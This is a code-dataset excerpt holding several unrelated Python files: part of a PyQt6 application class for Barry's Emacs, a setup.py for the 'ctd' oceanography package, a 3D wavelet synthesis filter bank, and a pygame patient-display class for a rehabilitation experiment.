folder\n if sys.platform == 'darwin':\n if 'PWD' in os.environ:\n os.chdir( os.environ['PWD'] )\n else:\n os.chdir( os.environ['HOME'] )\n\n self.__debug_noredirect = False\n self.__debug = True\n self.__mock_editor = False\n self.__log_stdout = False\n\n self.__callback_queue = queue.Queue()\n\n while len(args) > 1:\n arg = args[ 1 ]\n if arg.startswith( '-psn_' ):\n del args[ 1 ]\n\n elif arg.startswith( '--name=' ):\n self.opt_name = arg[len('--name='):]\n del args[ 1 ]\n\n elif arg == '--noredirect':\n self.__debug_noredirect = True\n del args[ 1 ]\n\n elif arg == '--log-stdout':\n self.__log_stdout = True\n del args[ 1 ]\n\n elif arg == '--debug' and len(args) > 2:\n self.__debug = True\n be_debug.setDebug( args[2] )\n del args[ 1 ]\n del args[ 1 ]\n\n elif arg == '--mock-editor':\n self.__mock_editor = True\n del args[ 1 ]\n\n elif arg == '--start-dir' and len(args) > 2:\n os.chdir( args[2] )\n del args[1]\n del args[1]\n\n elif arg == '--':\n break\n\n else:\n break\n\n self.__call_gui_result = None\n self.__call_gui_result_event = threading.Event()\n\n self.editor = None\n\n self.main_thread = threading.currentThread()\n if self.__mock_editor:\n self.editor_thread = None\n self.command_line_thread = None\n self.editor = MockEditor( self )\n\n else:\n self.editor_thread = threading.Thread( name='Editor', target=self.__runEditor )\n self.command_line_thread = threading.Thread( name='CommandLine', target=self.__runCommandLineHandler )\n\n self.progress_format = None\n self.progress_values = {}\n\n locale_path = be_platform_specific.getLocalePath( self )\n self.translation = gettext.translation(\n 'bemacs',\n str(locale_path),\n # language defaults\n fallback=True )\n\n import builtins\n # T_( 'non plural' )\n builtins.__dict__['T_'] = self.translation.gettext\n # S_( 'singular', 'plural', n )\n builtins.__dict__['S_'] = self.translation.ngettext\n # U_( 'static string' )\n builtins.__dict__['U_'] = lambda s: s\n\n # Debug settings\n self.__last_client_error = []\n\n self.setupLogging()\n\n self.log.info( 'startup_dir %s' % (self.startup_dir,) )\n self.log.info( 'locale_path %s' % (locale_path,) )\n self.log.info( 'find %r' % (gettext.find( 'bemacs', str(locale_path) ),) )\n self.log.info( 'info %r' % (self.translation.info(),) )\n self.log.info( T_(\"Barry's Emacs\") )\n\n self.log.info( 'Application dir %s' % (be_platform_specific.getAppDir(),) )\n self.log.info( 'emacs_user %s' % (be_platform_specific.getUserDir(),) )\n self.log.info( 'emacs_library %s' % (be_platform_specific.getLibraryDir(),) )\n self.log.info( 'emacs_doc %s' % (be_platform_specific.getDocDir(),) )\n\n self.user_window_preference_is_dark_mode = self.palette().text().color().lightnessF() > self.palette().window().color().lightnessF()\n\n self.prefs_mgr = be_preferences.BemacsPreferenceManager(\n self,\n be_platform_specific.getPreferencesFilename(),\n be_platform_specific.getSessionFilename() )\n\n self.main_window = None\n self.log.info( 'Qt argv[0] %r' % (sys.argv[0],) )\n self.log.info( 'Qt libraryPaths %r' % (QtWidgets.QApplication.libraryPaths(),) )\n\n # init QApplication now that we have the plugin dir setup\n QtWidgets.QApplication.__init__( self, [sys.argv[0]] )\n\n screen = self.primaryScreen()\n self.log.info( 'primary screen availableGeometry %r' % (screen.availableGeometry(),) )\n self.log.info( 'primary screen availableSize %r' % (screen.availableSize(),) )\n self.log.info( 'primary screen devicePixelRatio %r' % (screen.devicePixelRatio(),) )\n\n self.setDesktopFileName( '/usr/share/applications/org.barrys-emacs.editor.desktop' )\n self.log.info( 'desktopFileName %r' % (self.desktopFileName(),) )\n\n prefs = self.getPrefs()\n self.log.info( 'Is Dark mode %r, theme %r' %\n (self.user_window_preference_is_dark_mode, prefs.window.theme.name) )\n\n if not self.user_window_preference_is_dark_mode and prefs.window.theme.name == 'Dark':\n self.log.info( 'Setting dark palette' )\n self.setDarkPalette()\n\n elif self.user_window_preference_is_dark_mode:\n self.log.info( 'Setting dark mode styles' )\n self.setStyleSheet( 'QToolButton { border: none; }'\n 'QToolButton:checked { background: darkblue }' )\n\n self.main_window = be_main_window.BemacsMainWindow( self )\n\n self.MarshallToGuiThreadSignal.connect( self.handleMarshallToGuiThread )\n\n #QQQ self.setFallbackSessionManagementEnabled( False )\n\n self.saveStateRequest.connect( self.saveStateHandler )\n self.commitDataRequest.connect( self.commitDataHandler )\n\n def setDarkPalette( self ):\n # thanks to https://gist.github.com/QuantumCD/6245215\n self.setStyle( QtWidgets.QStyleFactory.create( \"Fusion\" ) )\n self.dark_palette = QtGui.QPalette()\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Window, QtGui.QColor( 53,53,53 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.WindowText, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Base, QtGui.QColor( 25,25,25 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.AlternateBase, QtGui.QColor( 53,53,53 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.ToolTipBase, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.ToolTipText, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Text, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Button, QtGui.QColor( 53,53,53 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.ButtonText, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.BrightText, QtCore.Qt.GlobalColor.red )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Link, QtGui.QColor( 42, 130, 218 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Highlight, QtGui.QColor( 42, 130, 218 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.HighlightedText, QtCore.Qt.GlobalColor.black )\n\n self.setPalette( self.dark_palette )\n\n self.setStyleSheet( 'QToolTip { color: white; background-color: black; border: 1px solid #1e1e1e; }'\n 'QToolButton { border: none; }'\n 'QToolButton:checked { background: darkblue }' )\n\n # called at start up to find the setting for session management\n def saveStateHandler( self, mgr ):\n self.log.info( 'Session Manager probing save state' )\n\n def commitDataHandler( self, mgr ):\n self.log.info( 'Session Manager calls commitDataHandler' )\n if self.editor.guiCheckIfModifiedFilesExist():\n if mgr.allowsInteraction():\n if not self.guiYesNoDialog( False, 'Modified files exist', 'Do you really want to quit Emacs?'):\n self.log.info( 'User wants session manager to cancel' )\n mgr.cancel()\n\n else:\n self.log.info( 'Modified files exist - telling session manager to cancel' )\n mgr.cancel()\n\n def getFrameGeometry( self ):\n return self.prefs_mgr.getFrameGeometry()\n\n def setFrameGeometry( self, geometry ):\n self.prefs_mgr.setFrameGeometry( geometry )\n\n def getPrefs( self ):\n return self.prefs_mgr.getPrefs()\n\n def event( self, event ):\n self._debugApp( 'BemacsApp.event() type() %r %s' %\n (event.type(), qt_event_type_names.get( event.type(), '-unknown-' )) )\n\n if event.type() == QtCore.QEvent.Type.FileOpen:\n self.guiClientCommandHandler( [os.getcwd(), 'emacs'] + [event.file()] )\n return True\n\n return QtWidgets.QApplication.event( self, event )\n\n def eventWrapper( self, function ):\n return EventScheduling( self, function )\n\n def isMainThread( self ):\n 'return true if the caller is running on the main thread'\n return self.main_thread is threading.currentThread()\n\n def setupLogging( self ):\n self.log = logging.getLogger( 'bemacs' )\n\n if self.__debug:\n self.log.setLevel( logging.DEBUG )\n else:\n self.log.setLevel( logging.INFO )\n\n if self.__log_stdout:\n handler = StdoutLogHandler()\n formatter = logging.Formatter( '%(asctime)s %(levelname)s %(message)s' )\n handler.setFormatter( formatter )\n self.log.addHandler( handler )\n\n else:\n log_filename = be_platform_specific.getLogFilename()\n # keep 10 logs of 100K each\n handler = RotatingFileHandler( log_filename, 'a', 100*1024, 10 )\n formatter = logging.Formatter( '%(asctime)s %(levelname)s %(message)s' )\n handler.setFormatter( formatter )\n self.log.addHandler( handler )\n\n self.log.info( T_(\"Barry's Emacs starting\") )\n\n self.log.debug( 'debug enabled' )\n\n def log_client_error( self, e, title='Error' ):\n # must run on the main thread\n if not self.isMainThread():\n self.marshallToGuiThread( self.log_client_error, (e, title) )\n return\n\n self.__last_client_error = []\n for message, _ in e.args[1]:\n self.__last_client_error.append( message )\n self.log.error( message )\n\n message = '\\n'.join( self.__last_client_error )\n QtWidgets.QMessageBox.critical( self, title, message ).exec()\n\n def log_error( self, e, title='Error' ):\n # must run on the main thread\n if not self.isMainThread():\n self.marshallToGuiThread( self.log_error, (e, title) )\n return\n\n message = str( e )\n self.log.error( message )\n\n QtWidgets.QMessageBox.critical( self, title, message ).exec()\n\n def setStatus( self, all_values ):\n if self.main_window is not None:\n self.main_window.setStatus( all_values )\n\n def refreshFrame( self ):\n self.main_window.refreshFrame()\n\n def writePreferences( self ):\n self.prefs_mgr.writePreferences()\n\n # notify app that the emacs panel is ready for use\n def onEmacsPanelReady( self ):\n self._debugApp( 'BemacsApp.onEmacsPanelReady()' )\n self.marshallToGuiThread( self.__initEditorThread, () )\n\n def guiHasFocus( self ):\n if self.editor is not None:\n self.editor.guiHasFocus()\n\n def onCloseEditor( self ):\n self.log.debug( 'onCloseEditor()' )\n self.editor.guiCloseWindow()\n\n def callGuiFunction( self, function, args ):\n self.__call_gui_result_event.clear()\n self.marshallToGuiThread( self.executeCallGuiFunction, (function, args) )\n self.__call_gui_result_event.wait()\n return self.__call_gui_result\n\n def executeCallGuiFunction( self, function, args ):\n self.__call_gui_result = function( *args )\n self.__call_gui_result_event.set()\n\n def marshallToGuiThread( self, function, args ):\n m = MarshalledCall( function, args )\n self._debugCallback( 'marshallToGuiThread %r sent' % (m,) )\n self.__callback_queue.put( m )\n self.MarshallToGuiThreadSignal.emit()\n\n def handleMarshallToGuiThread( self ):\n m = self.__callback_queue.get( block=False )\n self._debugCallback( 'handleMarshallToGuiThread %r start' % (m,) )\n\n try:\n m.dispatch()\n\n except:\n self.log.exception( 'handleMarshallToGuiThread\\n' )\n\n self._debugCallback( 'handleMarshallToGuiThread %r done' % (m,) )\n\n def debugShowCallers( self, depth ):\n if not self.__debug:\n return\n\n stack = inspect.stack()\n for index in range( 1, depth+1 ):\n if index >= len(stack):\n break\n\n caller = stack[ index ]\n filename = os.path.basename( caller[1] )\n self._debugApp( 'File: %s:%d, Function: %s' % (filename, caller[2], caller[3]) )\n del caller\n\n del stack\n\n def guiReportException( self, body, title ):\n QtWidgets.QMessageBox.critical( self.main_window, title, body )\n\n #--------------------------------------------------------------------------------\n def __initCommandLineThread( self ):\n self._debugApp( 'BemacsApp.__initCommandLineThread()' )\n if self.__mock_editor:\n return\n\n self.command_line_thread.daemon = True\n self.command_line_thread.start()\n\n def __runCommandLineHandler( self ):\n try:\n if sys.platform.startswith( 'win' ):\n import be_command_line_handler_windows\n handler = be_command_line_handler_windows.CommandLineHandlerWindows( self, self.opt_name )\n\n else:\n # unix and OS X\n import be_command_line_handler_posix\n handler = be_command_line_handler_posix.CommandLineHandlerPosix( self, self.opt_name )\n\n handler.processCommandLines()\n\n except Exception as e:\n self.log.exception( 'command line exception' )\n\n self.marshallToGuiThread( self.guiReportException, (str(e), 'Command line Exception') )\n\n def releaseWaitingClient( self, reply ):\n self.release_waiting_client_reply = reply\n\n def handleClientCommand( self, all_client_args ):\n self.marshallToGuiThread( self.guiClientCommandHandler, (all_client_args,) )\n\n def guiClientCommandHandler( self, all_client_args ):\n command_directory = all_client_args[0]\n command_args = all_client_args[1:]\n\n self.main_window.raise_()\n self.main_window.activateWindow()\n\n self._debugApp( 'guiClientCommandHandler: command_directory %r' % (command_directory,) )\n self._debugApp( 'guiClientCommandHandler: command_args %r' % (command_args,) )\n self.editor.guiClientCommand( command_directory, command_args )\n\n #--------------------------------------------------------------------------------\n def __initEditorThread( self ):\n self._debugApp( 'BemacsApp.__initEditorThread()' )\n if self.__mock_editor:\n return\n\n self.editor_thread.daemon = True\n self.editor_thread.start()\n\n def __runEditor( self ):\n import be_editor\n\n try:\n self._debugApp( 'BemacsApp.__runEditor()' )\n\n self.editor = be_editor.BEmacs( self )\n self.editor.initEmacsProfile( self.main_window.emacs_panel )\n\n # now that emacs has init'ed and processed any command line\n # the command line handler can be started\n self.marshallToGuiThread( self.__initCommandLineThread, () )\n\n # stay in processKeys until editor quits\n while True:\n rc = self.editor.processKeys()\n self._debugApp( 'processKeys rc %r' % (rc,) )\n\n mod = self.editor.modifiedFilesExist()\n if not mod:\n break\n\n can_exit = self.callGuiFunction( self.guiYesNoDialog, (False, 'Modified files exist', 'Do you really want to quit Emacs?') )\n if can_exit:\n break\n\n except Exception as e:\n self.log.exception( 'editor exception' )\n\n self.callGuiFunction( self.guiReportException, (str(e), 'Editor Exception') )\n\n self.marshallToGuiThread( self.quit, () )\n\n def guiYesNoDialog( self, default_to_yes, title, message ):\n #qqq# What is default for?\n if default_to_yes:\n default_button = QtWidgets.QMessageBox.StandardButton.Yes\n else:\n default_button = QtWidgets.QMessageBox.StandardButton.No\n\n rc = QtWidgets.QMessageBox.question( self.main_window, title, message, defaultButton=default_button )\n return rc == QtWidgets.QMessageBox.StandardButton.Yes\n\n def guiOpenFileDialog( self, title, existing_file, file_filter, detailed, folder, filename ):\n self._debugUiHook( 'guiOpenFileDialog( title=%r, existing_file=%r, file_filter=%r, detailed=%r, folder=%r, filename=%r )' % (title, existing_file, file_filter, detailed, folder, filename) )\n open_file = QtWidgets.QFileDialog( self.main_window, QtCore.Qt.WindowType.Dialog )\n open_file.setWindowTitle( title )\n\n open_file.setDefaultSuffix( '' )\n\n if existing_file:\n open_file.setFileMode( open_file.FileMode.ExistingFile )\n open_file.setAcceptMode( open_file.AcceptMode.AcceptOpen )\n\n else:\n open_file.setFileMode( open_file.FileMode.AnyFile )\n open_file.setAcceptMode( open_file.AcceptMode.AcceptSave )\n\n if detailed:\n open_file.setViewMode( open_file.ViewMode.Detail )\n\n else:\n open_file.setViewMode( open_file.ViewMode.List )\n\n if file_filter == '':\n open_file.setNameFilters( ['All (*)'] )\n\n else:\n open_file.setNameFilters( file_filter.split( '\\n' ) )\n\n if folder != '':\n open_file.setDirectory( folder )\n\n if filename != '':\n open_file.selectFile( filename )\n\n if open_file.exec():\n self._debugUiHook( 'open_file.exec()' )\n return open_file.selectedFiles()[0]\n\n return None\n\n def quit( self ):\n self._debugApp( 'quit()' )\n self.may_quit = True\n self.main_window.close()\n\n def setWindowTitle( self, title_suffix ):\n if self.opt_name is None:\n title = \"Barry's Emacs - %s\" % (title_suffix,)\n else:\n title = \"%s - %s\" % (self.opt_name, title_suffix)\n\n self.main_window.setWindowTitle( title )\n\n#--------------------------------------------------------------------------------\n#\n# RotatingFileHandler - based on python lib class\n#\n#--------------------------------------------------------------------------------\nclass RotatingFileHandler(logging.FileHandler):\n def __init__(self, filename, mode=\"a\", maxBytes=0, backupCount=0):\n \"\"\"\n Open the specified file and use it as the stream for logging.\n\n By default, the file grows indefinitely. You can specify particular\n values of maxBytes and backupCount to allow the file to rollover at\n a predetermined size.\n\n Rollover occurs whenever the current log file is nearly maxBytes in\n length. If backupCount is >= 1, the system will successively create\n new files with the same pathname as the base file, but with extensions\n \".1\", \".2\" etc. appended to it. For example, with a backupCount of 5\n and a base file name of \"app.log\", you would get \"app.log\",\n \"app.log.1\", \"app.log.2\", ... through to \"app.log.5\". The file being\n written to is always \"app.log\" - when it gets filled up, it is closed\n and renamed to \"app.log.1\", and if files \"app.log.1\", \"app.log.2\" etc.\n exist, then they are renamed to \"app.log.2\", \"app.log.3\" etc.\n respectively.\n\n If maxBytes is zero, rollover never occurs.\n \"\"\"\n logging.FileHandler.__init__(self, str(filename), mode)\n self.maxBytes = maxBytes\n self.backupCount = backupCount\n if maxBytes > 0:\n self.mode = \"a\"\n\n def doRollover(self):\n \"\"\"\n Do a rollover, as described in __init__().\n \"\"\"\n\n self.stream.close()\n if self.backupCount > 0:\n prefix, suffix = os.path.splitext( self.baseFilename )\n for i in range(self.backupCount - 1, 0, -1):\n sfn = \"%s.%d%s\" % (prefix, i, suffix)\n dfn = \"%s.%d%s\" % (prefix, i+1, suffix)\n if os.path.exists(sfn):\n #print( \"%s -> %s\" % (sfn, dfn) )\n if os.path.exists(dfn):\n os.remove(dfn)\n os.rename(sfn, dfn)\n dfn = self.baseFilename + \".1\"\n if os.path.exists(dfn):\n os.remove(dfn)\n os.rename(self.baseFilename, dfn)\n #print( \"%s -> %s\" % (self.baseFilename, dfn) )\n self.stream = open(self.baseFilename, \"w\")\n\n def emit(self, record):\n \"\"\"\n Emit a record.\n\n Output the record to the file, catering for rollover as described\n in setRollover().\n \"\"\"\n if self.maxBytes > 0: # are we rolling over?\n msg = \"%s\\n\" % self.format(record)\n try:\n self.stream.seek(0, 2) #due to non-posix-compliant Windows feature\n if self.stream.tell() + len(msg) >= self.maxBytes:\n self.doRollover()\n\n except ValueError:\n # on Windows we get \"ValueError: I/O operation on closed file\"\n # when a second copy of workbench is run\n self.doRollover()\n\n logging.FileHandler.emit(self, record)\n\n # force each record out on its own\n def shouldFlush( self ):\n return True\n\nclass StdoutLogHandler(logging.Handler):\n def __init__( self ):\n logging.Handler.__init__( self )\n\n def emit( self, record ):\n try:\n msg = self.format( record ) + '\\n'\n\n sys.stdout.write( msg )\n sys.stdout.flush()\n\n except:\n self.handleError( record )\n\nclass MockEditor(be_debug.EmacsDebugMixin):\n def __init__( self, app ):\n be_debug.EmacsDebugMixin.__init__( self )\n\n be_debug._debug_editor = True\n\n self.app = app\n self.count = 0\n\n self.vert_scroll = []\n self.horz_scroll = []\n\n self.log = self\n\n def debug( self, msg ):\n self.__writeToScreen( 3, 'debug: %s' % (msg,) )\n\n def __writeToScreen( self, line, text ):\n p = self.app.main_window.emacs_panel\n\n attr = [0] * len(text)\n\n new = (text, attr)\n\n p.termUpdateBegin()\n p.termUpdateLine( None, new, line )\n p.termTopos( line, 10 )\n all_state = {'readonly': True\n ,'overstrike': False\n ,'eol': 'LF'\n ,'line': 4199\n ,'column': 9\n ,'case-fold-search': True\n ,'replace-case': True\n ,'display-non-printing-characters': False\n ,'wrap-long-lines': False\n }\n p.termUpdateEnd( all_state, self.vert_scroll, self.horz_scroll )\n\n def guiCloseWindow( self, *args, **kwds ):\n self.app.marshallToGuiThread( self.app.quit, () )\n\n def guiGeometryChange( self, *args, **kwds ):\n pass\n\n def guiHasFocus( self, *args, **kwds ):\n pass\n\n def guiEventChar( self, char, shift ):\n print( 'guiEventChar( %r, %r )' % (char, shift) )\n self.count += 1\n\n self.__writeToScreen( 1, ' %6d guiEventChar( %r, %r ) called' % (self.count, char, shift) )\n\n if char == 'c':\n self.app.marshallToGuiThread( self.uiHookEditCopy, ('edit-copy', 'quick brown fox') )\n\n elif char == 'v':\n self.app.marshallToGuiThread( self.uiHookEditPaste, ('edit-paste',) )\n\n def guiEventMouse( self, *args, **kwds ):\n self.count += 1\n\n self.__writeToScreen( 2, ' %6d guiEventMouse called' % (self.count,) )\n\n # Only used in __mock_editor mode\n def uiHookEditCopy( self, cmd, text ):\n self.app.clipboard().setText( text )\n\n # Only used in __mock_editor mode\n def uiHookEditPaste( self, cmd, use_primary=False ):\n self._debugEditor( 'uiHookEditPaste use_primary=%r' % (use_primary,) )\n\n if use_primary:\n text = self.app.clipboard().text( mode=QtGui.QClipboard.Mode.Selection )\n\n else:\n text = self.app.clipboard().text( mode=QtGui.QClipboard.Mode.Clipboard )\n\n text = text.replace( '\\r\\n', '\\n' ).replace( '\\r', '\\n' )\n\n self._debugEditor( 'uiHookEditPaste text=%r' % (text,) )\n\nclass MarshalledCall:\n def __init__( self, function, args ):\n self.function = function\n self.args = args\n\n def dispatch( self ):\n self.function( *self.args )\n\n def __repr__( self ):\n return 'MarshalledCall: fn=%s nargs=%d' % (self.function.__name__, len(self.args))\n","sub_path":"Editor/PyQt6/be_app.py","file_name":"be_app.py","file_ext":"py","file_size_in_byte":26370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"523685521","text":"from __future__ import absolute_import, division, print_function\n\nimport os\n\nfrom setuptools import setup\n\nimport versioneer\n\nrootpath = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n return open(os.path.join(rootpath, *parts), 'r').read()\n\n\nlong_description = '{}\\n{}'.format(read('README.rst'), read('CHANGES.txt'))\nLICENSE = read('LICENSE.txt')\n\n\nwith open('requirements.txt') as f:\n require = f.readlines()\ninstall_requires = [r.strip() for r in require]\n\nsetup(\n name='ctd',\n version=versioneer.get_version(),\n license=LICENSE,\n long_description=long_description,\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Education',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Education',\n ],\n description='Tools to load hydrographic data as DataFrames',\n author='Filipe Fernandes',\n author_email='ocefpaf@gmail.com',\n maintainer='Filipe Fernandes',\n maintainer_email='ocefpaf@gmail.com',\n url='https://github.com/pyoceans/python-ctd',\n download_url='http://pypi.python.org/pypi/ctd',\n platforms='any',\n keywords=['oceanography', 'data analysis', 'DataFrame'],\n install_requires=install_requires,\n tests_require=['pytest'],\n packages=['ctd'],\n cmdclass=versioneer.get_cmdclass(),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"575029801","text":"from ornlm import upfir\nimport numpy as np\nfrom cshift3D import cshift3D\ndef permutationInverse(perm):\n inverse = [0] * len(perm)\n for i, p in enumerate(perm):\n inverse[p] = i\n return inverse\n\ndef sfb3D_A(lo, hi, sf, d):\n lpf=sf[:, 0]\n hpf=sf[:, 1]\n # permute dimensions of lo and hi so that dimension d is first.\n p=[(i+d)%3 for i in xrange(3)]\n lo=lo.transpose(p)\n hi=hi.transpose(p)\n\n (N1, N2, N3)=lo.shape\n N=2*N1\n L=sf.shape[0]\n y=np.zeros((N+L-2, N2, N3))\n for k in xrange(N3):\n y[:, :, k] = (np.array(upfir(lo[:, :, k], lpf)) + \n np.array(upfir(hi[:, :, k], hpf)))\n y[:(L-2), :, :] = y[:(L-2), :, :] + y[N:(N+L-2), :, :]\n y=y[:N, :, :]\n y=cshift3D(y, 1-L/2, 0);\n #permute dimensions of y (inverse permutation)\n q=permutationInverse(p)\n y=y.transpose(q);\n return y\n\ndef sfb3D(lo, hi, sf1, sf2=None, sf3=None):\n if sf2==None:\n sf2=sf1\n if sf3==None:\n sf3=sf1\n LLL=lo;\n LLH=hi[0];\n LHL=hi[1];\n LHH=hi[2];\n HLL=hi[3];\n HLH=hi[4];\n HHL=hi[5];\n HHH=hi[6];\n # filter along dimension 2\n LL=sfb3D_A(LLL, LLH, sf3, 2);\n LH=sfb3D_A(LHL, LHH, sf3, 2);\n HL=sfb3D_A(HLL, HLH, sf3, 2);\n HH=sfb3D_A(HHL, HHH, sf3, 2);\n # filter along dimension 1\n L=sfb3D_A(LL, LH, sf2, 1);\n H=sfb3D_A(HL, HH, sf2, 1);\n # filter along dimension 0\n y=sfb3D_A(L, H, sf1, 0);\n return y\n\n\n","sub_path":"dev/denoise/ornlm/wavelet/sfb3D.py","file_name":"sfb3D.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"242381228","text":"import pygame\nfrom riglib.stereo_opengl.window import WindowDispl2D\nfrom riglib.stereo_opengl.primitives import Circle, Sector, Line\nfrom config import config\nimport numpy as np\nimport os\nfrom riglib.stereo_opengl.models import Group\n\nclass PatientDisp(WindowDispl2D):\n\n def __init__(self, *args, **kwargs):\n # Hard code window size -- full size of monitor for patient screen and exp display\n self.exp_window_size = (500, 200) #Size of window to display to the experimenter\n self.pat_window_size = (1000, 560) #Size of window to display to the patient\n self.txt_pos = tuple(1/4.*np.array(self.pat_window_size))\n self.extended_window_size = tuple((self.exp_window_size[0] + self.pat_window_size[0],\n np.max([self.exp_window_size[1], self.pat_window_size[1]])))\n\n self.exp_wind_coord = (0, 0)\n self.pat_wind_coord = (self.exp_window_size[0], 0)\n\n self.pat_background_color = (100, 100, 100, 1)\n self.init_pat_display_done = 0\n self.seq = kwargs.pop('seq', None)\n self.seq_params = kwargs.pop('sequ_params', None)\n\n\n super(PatientDisp, self).__init__(*args, **kwargs)\n\n def screen_init(self):\n\n os.environ['SDL_VIDEO_WINDOW_POS'] = config.display_start_pos\n os.environ['SDL_VIDEO_X11_WMCLASS'] = \"iBMI\"\n pygame.init()\n self.font = pygame.font.Font(None, 36)\n self.clock = pygame.time.Clock()\n\n flags = pygame.NOFRAME\n self._set_workspace_size()\n\n self.workspace_x_len = self.workspace_top_right[0] - self.workspace_bottom_left[0]\n self.workspace_y_len = self.workspace_top_right[1] - self.workspace_bottom_left[1]\n\n self.display_border = 10\n \n self.exp_size = np.array(self.exp_window_size, dtype=np.float64)\n self.screen = pygame.display.set_mode(self.extended_window_size, flags)\n\n self.screen_background_exp = pygame.Surface(self.exp_window_size).convert()\n self.screen_background_pat = pygame.Surface(self.pat_window_size).convert()\n \n self.screen_background_exp.fill(self.background)\n self.screen_background_pat.fill(self.pat_background_color)\n\n x1, y1 = self.workspace_top_right\n x0, y0 = self.workspace_bottom_left\n\n self.normalize = np.array(np.diag([1./(x1-x0), 1./(y1-y0), 1]))\n self.center_xform = np.array([[1., 0, -x0], \n [0, 1., -y0],\n [0, 0, 1]])\n self.norm_to_screen = np.array(np.diag(np.hstack([self.exp_size, 1])))\n\n # the y-coordinate in pixel space has to be swapped for some graphics convention reason\n self.flip_y_coord = np.array([[1, 0, 0],\n [0, -1, self.exp_size[1]],\n [0, 0, 1]])\n\n self.pos_space_to_pixel_space = np.dot(self.flip_y_coord, np.dot(self.norm_to_screen, np.dot(self.normalize, self.center_xform)))\n\n self.world = Group(self.models)\n # Dont 'init' self.world in this Window. Just allocates a bunch of OpenGL stuff which is not necessary (and may not work in some cases)\n # self.world.init()\n\n #initialize surfaces for translucent markers\n\n self.neutral_arm = pygame.image.load(os.path.expandvars('$ISMORE/invasive/display_pngs/neutral.png'))\n self.neutral_arm = self.neutral_arm.convert()\n \n TRANSPARENT = (255,0,255)\n\n #Gets value at (0,0) to make background of arm image transparent\n arm_TRANSPARENT = self.neutral_arm.get_at((0,0))\n\n #Surface ['0'] is the cursor surface\n #Surface [1] is the target surface\n #Surface [2] is the patient display surface\n #Surface [3] is the arm image surface\n\n self.surf={}\n self.surf['0'] = pygame.Surface(self.exp_size)\n self.surf['0'].fill(TRANSPARENT)\n self.surf['0'].set_colorkey(TRANSPARENT)\n\n self.surf['1'] = pygame.Surface(self.exp_size)\n self.surf['1'].fill(TRANSPARENT)\n self.surf['1'].set_colorkey(TRANSPARENT) \n\n self.surf['2'] = pygame.Surface(self.pat_window_size)\n self.surf['2'].fill(TRANSPARENT)\n self.surf['2'].set_colorkey(TRANSPARENT)\n\n self.surf['3'] = pygame.Surface(self.pat_window_size)\n self.surf['3'].fill(arm_TRANSPARENT)\n self.surf['3'].set_colorkey(arm_TRANSPARENT) \n\n #values of alpha: higher = less translucent\n self.surf['0'].set_alpha(170) #Cursor\n self.surf['1'].set_alpha(130) #Targets\n self.surf['2'].set_alpha(130)\n self.surf['3'].set_alpha(200)\n \n self.exp_surf_background = pygame.Surface(self.exp_window_size).convert()\n self.exp_surf_background.fill(TRANSPARENT)\n\n self.pat_surf_background = pygame.Surface(self.pat_window_size).convert()\n self.pat_surf_background.fill(TRANSPARENT)\n\n self.arm_surf_background = pygame.Surface(self.pat_window_size).convert()\n self.arm_surf_background.fill(arm_TRANSPARENT)\n\n self.i = 0\n\n\n def draw_world(self):\n #Refreshes the screen with original background\n self.screen.blit(self.screen_background_exp, self.exp_wind_coord)\n self.screen.blit(self.screen_background_pat, self.pat_wind_coord)\n\n self.surf['0'].blit(self.exp_surf_background,(0, 0))\n self.surf['1'].blit(self.exp_surf_background,(0, 0))\n self.surf['2'].blit(self.pat_surf_background,(0, 0))\n self.surf['3'].blit(self.arm_surf_background,(0, 0))\n \n # surface index\n self.i = 0\n\n for model in self.world.models:\n self.draw_model(model)\n self.i += 1\n\n self.update_pat_display()\n\n #Renders the new surfaces\n self.screen.blit(self.surf['0'], self.exp_wind_coord)\n self.screen.blit(self.surf['1'], self.exp_wind_coord)\n self.screen.blit(self.surf['2'], self.pat_wind_coord)\n self.screen.blit(self.surf['3'], self.pat_wind_coord)\n\n pygame.display.update()\n\n def update_pat_display(self):\n '''Example code: To be overwritten in child classes'''\n if self.state == 'target':\n text = self.font.render(\"Target Number:\"+str(self.trial_ix_print), 1, (1, 1, 1))\n self.surf['2'].blit(text, self.txt_pos)\n self.surf['3'].blit(self.neutral_arm, (0,0))\n\n","sub_path":"ismore/invasive/patient_display.py","file_name":"patient_display.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
